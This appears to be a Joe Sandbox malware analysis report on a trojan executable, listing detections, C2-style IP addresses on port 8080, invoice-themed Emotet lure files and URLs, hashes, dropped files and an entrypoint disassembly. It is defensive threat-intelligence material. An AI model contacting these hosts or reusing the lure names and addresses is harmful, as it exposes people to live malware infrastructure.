                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.evad.winEXE@20/8@0/5
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 86.5% (good quality ratio 75.7%)
                                                                                      • Quality average: 76.2%
                                                                                      • Quality standard deviation: 33.6%
                                                                                      HCA Information:Failed
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      Warnings:
                                                                                      Show All
                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.193.48, 92.122.145.220, 40.88.32.150, 13.88.21.125, 20.82.210.154, 23.218.208.56, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 20.54.26.129
                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      01:04:48API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                      01:06:03API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      193.169.54.12_01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      hEHN0WzBF.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      http://baseballpontedipiave.com/Sales-Invoice/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      emotet2.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      20180212-20_46_01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      mj03dyvx_2076767.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      http://okomekai.symphonic-net.com/Invoice-69070770/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      mail.rodolfogvalencia.com/Invoice/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      173.230.145.224mj03dyvx_2076767.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      http://okomekai.symphonic-net.com/Invoice-69070770/Get hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      mail.rodolfogvalencia.com/Invoice/Get hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      74039.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Dokumente.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Dokumente.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      http://bri8pos.in/Outstanding-INVOICE-VKBH/2570051/445/Get hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      uSUbynSM4.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      nbtDJb.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      EmQ2Ard8g4.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Aj82OO6oKIHl4B.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      http://cinetiux.com/LLC/?newinvoice01.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Emotet119.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/

                                                                                      Domains

                                                                                      No context

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      ICFSYSTEMSDEsample.exe.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      yxghUyIGb4.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      0HvIGwMmBV.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      pitEBNziGR.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      _01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      hEHN0WzBF.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      http://baseballpontedipiave.com/Sales-Invoice/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      emotet2.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      20180212-20_46_01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      mj03dyvx_2076767.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      SZERVERNET-HU-ASHUsample.exe.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      yxghUyIGb4.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      0HvIGwMmBV.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      pitEBNziGR.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      https://kaliconsultancy.com/wp-content/uploads/2020/09/wflnfkqajn.phpGet hashmaliciousBrowse
                                                                                      • 79.172.193.55
                                                                                      https://delina.hu/praktikak/2016/02/01/csinalj-te-is-kreativ-mozaikkoveketGet hashmaliciousBrowse
                                                                                      • 95.140.36.82
                                                                                      762002910000000.exeGet hashmaliciousBrowse
                                                                                      • 79.172.193.32
                                                                                      1Wire_Copy.exeGet hashmaliciousBrowse
                                                                                      • 79.172.242.87
                                                                                      430#U0437.jsGet hashmaliciousBrowse
                                                                                      • 79.172.193.32
                                                                                      59Transfer-copy.exeGet hashmaliciousBrowse
                                                                                      • 79.172.242.92
                                                                                      25wire_slip.exeGet hashmaliciousBrowse
                                                                                      • 79.172.242.89
                                                                                      BK.485799485.jseGet hashmaliciousBrowse
                                                                                      • 79.172.193.32
                                                                                      PO 2312 CBD- 1302 S18.docGet hashmaliciousBrowse
                                                                                      • 79.172.242.87
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      http://okomekai.symphonic-net.com/Invoice-69070770/Get hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Informationen #018612525.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      LINODE-APLinodeLLCUSPrivate doc.docmGet hashmaliciousBrowse
                                                                                      • 212.71.251.238
                                                                                      invoice_document.docmGet hashmaliciousBrowse
                                                                                      • 212.71.251.238
                                                                                      sample.exe.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      Document_Opener.exe.14.exeGet hashmaliciousBrowse
                                                                                      • 88.80.186.210
                                                                                      Audio playback (7656) for joew Camrosa.htmGet hashmaliciousBrowse
                                                                                      • 192.81.132.201
                                                                                      Paymonth invoice.exeGet hashmaliciousBrowse
                                                                                      • 45.79.19.196
                                                                                      PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                                      • 45.79.175.190
                                                                                      FB11.exeGet hashmaliciousBrowse
                                                                                      • 172.105.116.135
                                                                                      salescontractv2draft.exeGet hashmaliciousBrowse
                                                                                      • 45.56.127.45
                                                                                      yxghUyIGb4.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      TaTYytHaBk.exeGet hashmaliciousBrowse
                                                                                      • 45.33.51.71
                                                                                      0HvIGwMmBV.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      pitEBNziGR.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      aEdlObiYav.exeGet hashmaliciousBrowse
                                                                                      • 45.33.54.74
                                                                                      1m7388e48E.exeGet hashmaliciousBrowse
                                                                                      • 45.79.26.231
                                                                                      4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                                                                      • 45.79.19.196
                                                                                      SecuriteInfo.com.Trojan.Kronos.21.31435.exeGet hashmaliciousBrowse
                                                                                      • 139.162.210.252
                                                                                      Z8bln2YPEw.exeGet hashmaliciousBrowse
                                                                                      • 96.126.101.20
                                                                                      yxQWzvifFe.exeGet hashmaliciousBrowse
                                                                                      • 96.126.123.244
                                                                                      Purchase _Order-EndUer#99849959.Pdff.exeGet hashmaliciousBrowse
                                                                                      • 139.162.21.249

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4096
                                                                                      Entropy (8bit):0.5967038728698416
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:0Fuc0k1GaD0JOCEfMuaaD0JOCEfMKQmDAS1Al/gz2cE0fMbhEZolrRSQ2hyYIIT:0wc7GaD0JcaaD0JwQQAS1Ag/0bjSQJ
                                                                                      MD5:557EB5010357D1A9D8B69FF66BEC687C
                                                                                      SHA1:764181735B72D763A387FCAAAB027DC49E00E569
                                                                                      SHA-256:2E28A7E8B4A55DC24CEA579C3EA6DFB92218471230A8F8160EE26847868516CB
                                                                                      SHA-512:0DBE74078B89D9D28D1A0BF9351B0F71BDC80868CDF413480273E786041D0F58C5A09B60D41892862F71F2DF13C32A06633FFC314027D4288C8EE8930B0CE076
                                                                                      Malicious:false
                                                                                      Preview: ......:{..(.....0....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................0....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x544acddf, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.09645323079349617
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:lOkGzwl/+xVaRIE11Y8TRXK8wMVsKvOkGzwl/+xVaRIE11Y8TRXK8wMVsK:O0+xVaO4blKKsKU0+xVaO4blKKsK
                                                                                      MD5:5069A6622B33EC1DC47A5650DF987E58
                                                                                      SHA1:F443A69F7098B911C5887BBA86BD949566E90EDD
                                                                                      SHA-256:E92951CEAC0CC4A830A2A5649B494D1BED30F7C11B09CBD271CC6CD3E031080B
                                                                                      SHA-512:36D193C7CADE35811709DEA13E5F967454FD60947BEC861C5FB79A897147DE7768A3E793F5E053A31EA5B00C9C652E1B187E1CAC9FA3A4CAAA5B9FB155BC791D
                                                                                      Malicious:false
                                                                                      Preview: TJ..... ................e.f.3...w........................&..........w..0....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................O..|0....y.k................4F..0....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8192
                                                                                      Entropy (8bit):0.1106223166644607
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:22LEvVfWDjSXl/bJdAtiqV7WVwll:2bdWDj8t4TMVQ
                                                                                      MD5:2836D7643BFCE5ED2AA7B69CB91982CD
                                                                                      SHA1:47877650BF812E878E9AF8F24DF295212921216A
                                                                                      SHA-256:7FD1A92DAE29706C658A036195110E89B372DDA1CC71E881C2EFB96C271738FD
                                                                                      SHA-512:F214B46609C7A14653668A4DCC31576B0EE9D7AECD42F0C4B07CE626F61A00AEC6C47BBB5935E75985F6172C416279F147669C703C8BCC5349D293F4C62D1811
                                                                                      Malicious:false
                                                                                      Preview: .........................................3...w..0....y.......w...............w.......w....:O.....w..................4F..0....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11001861610408081
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:26sTXm/Ey6q9995J+lq3qQ10nMCldimE8eawHjcDP:26sKl6824LyMCldzE9BHjcDP
                                                                                      MD5:2B1D3EA84AD75DFE777EB1A8DE8C7399
                                                                                      SHA1:001A0DB4193F3B96D86E8D87F53C77894903ADE2
                                                                                      SHA-256:F23C6582708C997583FD771F9F9F99905AF86F621F4D42B56E13EF88D2E62DAC
                                                                                      SHA-512:6F33493FAA205A76E1F0D643BCA6C7DC7C9C608FF3CDCC16348FCF8BBFE7A6F8BA8417302A0298E6A2405BB1EB7D3F374C16639A8AEB6210BE8CA71B8D619692
                                                                                      Malicious:false
                                                                                      Preview: .........................................................................................K.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........`(..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........JU......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11253865390259021
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:1Xm/Ey6q9995Jkz1miM3qQ10nMCldimE8eawHza1miIGl:Yl68cz1tMLyMCldzE9BHza1tIQ
                                                                                      MD5:7ADCAD211CDF2FD1CC8DA2A1791621CE
                                                                                      SHA1:75D204D950DB597D6C190855454FB4F85F8D4B5A
                                                                                      SHA-256:7AAD7EC6DC2F708F979C1BF507B707C9F31E74F6F848FA47D97B7C3BB5D83430
                                                                                      SHA-512:489E1F06B9B0A85ECBCB3DED6EB8FAAEFC1D449BAF93D5A1152BAF7E970A1BB8E13A2BDDE9767D431ACA5796A30C13E6DDEB805C34AC458DCE29557E150EB2F6
                                                                                      Malicious:false
                                                                                      Preview: ........................................................................................3........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........`(..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11236779795229494
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bjXm/Ey6q9995JT/z1mK2P3qQ10nMCldimE8eawHza1mKhP:2l68zz1iPLyMCldzE9BHza1V
                                                                                      MD5:524406AD7E80D9C5BC5192B5E4BA2D33
                                                                                      SHA1:7E649F44A797517C0059D59A81A5A9AB56EE744D
                                                                                      SHA-256:8EB5A7410E9C16FC62FA6C86AE419E4C1381539E879BCC553E0AD3E065BBFB22
                                                                                      SHA-512:357F3AE3C291D71AC12A7D7CB1B1ABDCCB6313834F475009AAB1324DAE916EC774DE7DE33025125C2D4FE2987EFA95DD6A4DE3561ABB12A22E03654ED879FB4C
                                                                                      Malicious:false
                                                                                      Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........`(..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):906
                                                                                      Entropy (8bit):3.146261445090396
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rZwZ0rRk9+MlWlLehB4yAq7ejC4wZ0rw:OaqdmuF3rKz+kWReH4yJ7MyZ
                                                                                      MD5:03776C83F89D95C41CC2CBE479A86768
                                                                                      SHA1:F1F1CB6A2F4C625FA8EF2F0CF333403AD8C03643
                                                                                      SHA-256:14491B3FDACC70C81B109E07706D4A6439E236C5445782A76456FB64F5788F2B
                                                                                      SHA-512:80928123142E0D534901B2DD5604A02C33D7E3BF8C507AB271BE77D409D005A1AE32B135D6922F57A7EC8FBD46032281959700B76D2BA3ED08541FF6C3D94EE2
                                                                                      Malicious:false
                                                                                      Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. A.p.r. .. 0.3. .. 2.0.2.1. .0.1.:.0.6.:.0.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. A.p.r. .. 0.3. .. 2.0.2.1. .0.1.:.0.6.:.0.3.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.436116781781946
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:9fdUNaHzLv.exe
                                                                                      File size:45568
                                                                                      MD5:ecbc4b40dcfec4ed1b2647b217da0441
                                                                                      SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
                                                                                      SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
                                                                                      SHA512:3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
                                                                                      SSDEEP:768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

                                                                                      File Icon

                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x409ee0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:4cfe8bbfb0ca5b84bbad08b043ea0c87

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      push esi
                                                                                      push 0040C1F0h
                                                                                      push 3966646Ch
                                                                                      push 00000009h
                                                                                      mov ecx, D22E2014h
                                                                                      call 00007FB7BCCE900Eh
                                                                                      mov edx, 004011F0h
                                                                                      mov ecx, eax
                                                                                      call 00007FB7BCCE8F32h
                                                                                      add esp, 0Ch
                                                                                      mov ecx, 8F7EE672h
                                                                                      push 0040C0D0h
                                                                                      push 6677A1D2h
                                                                                      push 00000048h
                                                                                      call 00007FB7BCCE8FE9h
                                                                                      mov edx, 004010D0h
                                                                                      mov ecx, eax
                                                                                      call 00007FB7BCCE8F0Dh
                                                                                      add esp, 0Ch
                                                                                      push 08000000h
                                                                                      push 00000000h
                                                                                      call dword ptr [0040C1A8h]
                                                                                      push eax
                                                                                      call dword ptr [0040C10Ch]
                                                                                      mov esi, eax
                                                                                      test esi, esi
                                                                                      je 00007FB7BCCF1348h
                                                                                      push 08000000h
                                                                                      push 00000000h
                                                                                      push esi
                                                                                      call dword ptr [0040C1F8h]
                                                                                      add esp, 0Ch
                                                                                      push esi
                                                                                      push 00000000h
                                                                                      call dword ptr [0040C1A8h]
                                                                                      push eax
                                                                                      call dword ptr [0040C1E8h]
                                                                                      call 00007FB7BCCE896Ah
                                                                                      push 00000000h
                                                                                      call dword ptr [0040C1ACh]
                                                                                      pop esi
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      mov edi, edx
                                                                                      mov dword ptr [ebp-0Ch], ecx
                                                                                      mov esi, 00000001h
                                                                                      mov dword ptr [ebp-08h], esi
                                                                                      mov eax, dword ptr [edi]
                                                                                      cmp eax, 7Fh
                                                                                      jbe 00007FB7BCCF1331h
                                                                                      lea ecx, dword ptr [ecx+00h]
                                                                                      shr eax, 07h
                                                                                      inc esi
                                                                                      cmp eax, 7Fh

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [LNK] VS2013 UPD4 build 31101
                                                                                      • [IMP] VS2008 SP1 build 30729

